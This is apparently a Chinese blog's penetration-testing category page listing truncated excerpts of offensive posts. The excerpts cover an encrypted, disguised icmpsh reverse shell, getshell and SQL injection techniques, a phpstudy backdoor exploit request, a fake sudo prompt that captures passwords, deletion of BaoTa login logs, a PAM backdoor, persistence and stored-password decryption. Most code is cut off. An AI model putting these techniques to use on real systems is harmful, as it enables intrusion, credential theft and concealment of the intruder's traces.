随笔分类 -  渗透测试

摘要:icmpsh改进 原项目 https://github.com/bdamele/icmpsh 改进后项目 https://github.com/1457716957/icmpsh 改进点 1. 通信进行了aes_ctr加密(包括传输内容和下发指令) 2. 伪装了windows下的正常通信 正常通信的 阅读全文
posted @ 2022-11-21 21:41 是谁走漏了消息 阅读(39) 评论(0) 推荐(0) 编辑
摘要:phpmyadmin getshell 参考链接 https://xz.aliyun.com/t/3283#toc-8 1.直接写webshell 1.查看 secure_file_priv SHOW VARIABLES LIKE "secure_file_priv"; 当你尝试执行select i 阅读全文
posted @ 2022-11-20 21:41 是谁走漏了消息 阅读(112) 评论(0) 推荐(0) 编辑
摘要:mssql 参考连接 https://www.cnblogs.com/shellr00t/p/5310187.html https://fuping.site/2017/05/16/MSSQL-DBA-Permission-GET-WEBSHELL/ 1.报错注入: 【1】首先爆版本:http:// 阅读全文
posted @ 2022-11-20 21:37 是谁走漏了消息 阅读(47) 评论(0) 推荐(0) 编辑
摘要:mysql基础注入知识 参考资料: https://pureqh.top/?p=1882 bypass安全狗 常用函数 ascii() length() substr() # 左闭右闭 hex() isnull() # isnull+load_file可以扫描判断文件名是否存在 cancat(0x7 阅读全文
posted @ 2022-11-20 21:31 是谁走漏了消息 阅读(23) 评论(0) 推荐(0) 编辑
摘要:Spring Boot Actuator(eureka xstream deserialization RCE) 参考资料: https://www.jianshu.com/p/91a5ca9b7c1c 本文的大部分步骤 https://github.com/LandGrey/SpringBootV 阅读全文
posted @ 2022-11-20 21:27 是谁走漏了消息 阅读(114) 评论(0) 推荐(0) 编辑
摘要:xhell6解密脚本 import hashlib import base64 string = "nt authority\system S-1-5-18" # ######## sha256 ######## sha256 = hashlib.sha256() sha256.update(str 阅读全文
posted @ 2022-11-20 21:14 是谁走漏了消息 阅读(33) 评论(0) 推荐(0) 编辑
摘要:简单linux-sudo密码劫持脚本 #!/bin/bash swhoami=`whoami` if [[ ! -f "/tmp/..." ]]; then swhoami=`whoami` read -s -p "[sudo] password for $swhoami: " passwd ech 阅读全文
posted @ 2022-11-20 21:12 是谁走漏了消息 阅读(109) 评论(0) 推荐(0) 编辑
摘要:thinkphp漏洞 参考资料:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection 敏感信息 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3 阅读全文
posted @ 2022-11-20 21:10 是谁走漏了消息 阅读(189) 评论(0) 推荐(0) 编辑
摘要:python版nbtscan # -*- coding:utf-8 -*- import socket import sys from datetime import datetime # import threading import time import ipaddress # 识别ip段模块 阅读全文
posted @ 2022-11-20 21:09 是谁走漏了消息 阅读(128) 评论(0) 推荐(0) 编辑
摘要:phpstudy后门 exp GET /index.php HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; 阅读全文
posted @ 2022-11-20 21:05 是谁走漏了消息 阅读(59) 评论(0) 推荐(0) 编辑
摘要:golang接收文件脚本 package main import ( "io" "os" "fmt" "io/ioutil" "net/http" ) // https://www.jianshu.com/p/b49cc19d26f0 参考资料 func uploadHandler(w http.R 阅读全文
posted @ 2022-11-20 21:03 是谁走漏了消息 阅读(56) 评论(0) 推荐(0) 编辑
摘要:av识别脚本 # /usr/bin/env python # _*_ coding:utf-8 _*_ # author: smelond av_exe = ("1433.exe", "360leakfixer.exe", "360rp.exe", "360RP.exe", "360safe.exe 阅读全文
posted @ 2022-11-20 21:00 是谁走漏了消息 阅读(425) 评论(0) 推荐(0) 编辑
摘要:源码包扫描 # import requests import subprocess import os, re from urllib.parse import urlparse from multiprocessing.pool import ThreadPool pool = ThreadPoo 阅读全文
posted @ 2022-11-20 20:58 是谁走漏了消息 阅读(18) 评论(0) 推荐(0) 编辑
摘要:烂番茄 利用条件 域内存在任意一台域控和域功能级别是server 2012及以上时,可以通过给所在机器配置"msDS-AllowedToActOnBehalfOfOtherIdentity"属性来设置rbcd,然后通过s4u协议申请高权限票据进行利用 exp using System; using 阅读全文
posted @ 2022-11-20 20:55 是谁走漏了消息 阅读(124) 评论(0) 推荐(0) 编辑
摘要:禅道 参考资料 https://blog.csdn.net/qq_29678299/article/details/109987739 搭建 官方地址 https://www.zentao.net/index.html 开源版本下载 https://www.zentao.net/download/z 阅读全文
posted @ 2022-11-20 20:52 是谁走漏了消息 阅读(35) 评论(0) 推荐(0) 编辑
摘要:宝塔利用 删除宝塔中的登陆日志 import sqlite3 import argparse def log(id): conn = sqlite3.connect('default.db') c = conn.cursor() c.execute("DELETE from logs where I 阅读全文
posted @ 2022-11-20 20:51 是谁走漏了消息 阅读(16) 评论(0) 推荐(0) 编辑
摘要:后门-pam认证 参考资料 https://www.cnblogs.com/adhzl/p/12098397.html https://www.cnblogs.com/-qing-/p/13178917.html https://www.jianshu.com/p/4bd5ce0f5894 # Li 阅读全文
posted @ 2022-11-20 16:33 是谁走漏了消息 阅读(123) 评论(0) 推荐(0) 编辑
摘要:bypass-php-FastCGI PHPFPM 参考资料: https://www.anquanke.com/post/id/197745#h3-5 PHP 突破 disable_functions 常用姿势以及使用 Fuzz 挖掘含内部系统调用的函数 https://www.leavesong 阅读全文
posted @ 2022-11-20 16:30 是谁走漏了消息 阅读(52) 评论(0) 推荐(0) 编辑
摘要:root权限-维持技巧 参考链接: https://github.com/422926799/note/blob/master/%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/Linux%E6%8F%90%E6%9D%83/%E4%BD%BF%E7%94%A8%E5%8A% 阅读全文
posted @ 2022-11-20 16:24 是谁走漏了消息 阅读(46) 评论(0) 推荐(0) 编辑
摘要:MobaXterm密码解密 快速说明(本地解密未成功) 1. 需要配置文件(或注册表信息,hostname,net user) 2. python3环境, 需要安装 pycryptodome 3. 解密失败的因素怀疑是master password(这款软件不仅会加密密码,其中master pasw 阅读全文
posted @ 2022-11-20 16:17 是谁走漏了消息 阅读(5495) 评论(1) 推荐(0) 编辑